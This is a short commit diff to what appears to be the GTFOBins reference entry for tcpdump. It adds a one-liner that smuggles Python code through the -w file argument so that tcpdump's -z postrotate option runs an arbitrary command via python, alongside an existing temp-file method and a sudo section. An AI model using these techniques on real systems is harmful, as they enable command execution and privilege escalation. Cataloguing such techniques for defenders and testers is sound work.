Update tcpdump (adding one-line with arbitrary command)

_gtfobins/tcpdump.md

@@ -5,12 +5,16 @@ description: |
   In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
 functions:
   command:
-    - code: |
+    - description: This requires several commands.
+      code: |
         COMMAND='id'
         TF=$(mktemp)
         echo "$COMMAND" > $TF
         chmod +x $TF
         tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+    - descprition: One-liner to run arbitrary command leveraging python argument parser that does not require a space between the option -c and the value.
+      code: |
+        tcpdump -ln -i lo -w -c__import__\(\"os\"\).system\(\"id\"\) -W 1 -G 1 -z /usr/bin/python
   sudo:
     - code: |
         COMMAND='id'